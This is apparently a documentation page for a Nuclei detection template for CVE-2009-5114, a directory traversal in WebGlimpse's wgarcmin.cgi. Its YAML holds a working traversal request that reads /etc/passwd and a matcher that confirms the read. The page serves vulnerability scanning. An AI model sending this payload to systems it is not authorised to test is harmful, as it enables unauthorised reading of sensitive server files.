WebGlimpse 2.18.7 - Directory Traversal
ID: CVE-2009-5114
Severity: medium
Author: daffainfo
Tags: cve,cve2009,edb,lfi,iwork
Description
Section titled “Description”A directory traversal vulnerability in wgarcmin.cgi in WebGlimpse 2.18.7 and earlier allows remote attackers to read arbitrary files via a .. (dot dot) in the DOC parameter.
YAML Source
Section titled “YAML Source”id: CVE-2009-5114
info: name: WebGlimpse 2.18.7 - Directory Traversal author: daffainfo severity: medium description: A directory traversal vulnerability in wgarcmin.cgi in WebGlimpse 2.18.7 and earlier allows remote attackers to read arbitrary files via a .. (dot dot) in the DOC parameter. impact: | An attacker can view, modify, or delete sensitive files on the server, potentially leading to unauthorized access or data leakage. remediation: Apply all relevant security patches and product upgrades. reference: - https://www.exploit-db.com/exploits/36994 - https://nvd.nist.gov/vuln/detail/CVE-2009-5114 - http://websecurity.com.ua/2628/ - https://exchange.xforce.ibmcloud.com/vulnerabilities/74321 - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2009-5114 cwe-id: CWE-22 epss-score: 0.01077 epss-percentile: 0.84241 cpe: cpe:2.3:a:iwork:webglimpse:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: iwork product: webglimpse tags: cve,cve2009,edb,lfi,iwork
http: - method: GET path: - "{{BaseURL}}/wgarcmin.cgi?NEXTPAGE=D&ID=1&DOC=../../../../etc/passwd"
matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:"
- type: status status: - 200# digest: 4a0a00473045022039801aa01131915fb20d80cf30ae2d22443482fdf6a07c2545700f388368563e022100a9d8ec40121a1059cbae8a5271ca8e9d427c202be8f9f602a4b69af7e14ab7ee:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2009/CVE-2009-5114.yaml"